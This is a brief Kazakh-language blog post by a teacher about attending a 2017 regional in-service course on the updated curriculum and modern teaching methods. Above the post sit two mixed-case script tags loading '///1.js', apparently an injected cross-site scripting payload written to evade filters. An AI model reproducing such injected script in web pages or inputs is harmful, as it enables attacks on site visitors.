<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
07.06.2017
Мен, 15.05-02.06.2017ж аралығында Ақмола облысы, Жақсы ауданындағы Жақсы №2 мектепте облыстық курска барып білімімді одан әрі жетілдіріп келдім.Көкшетау қаласынан Өрлеуден бізге тренер Сағындыкова Гульдана Мурзабековна келді. Жаңартылған білім беру бағдарламасында кіріспе, тиімді оқыту және оқу, критериалды бағалауға арналған негізгі тәсілдер, жаңартылған білім беру бағдарламасын іске асыру жолдарын жоспарлауды үйрендім. Біліктілікті арттыру бағдарламасынан біраз мағұлматтар жинақтадым. Тиімді оқу, белсенді оқу, бірлескен оқу, саралап оқу, пәнаралық байланыс, модельдеу, электронды оқу жаңа техналогияны пайдалану әдістерін білдім. Осы білімді арттыру курсынан жинақтаған білімді алдағы оқу жылындағы жұмысымда пайдаланамын.
Просмотров: 510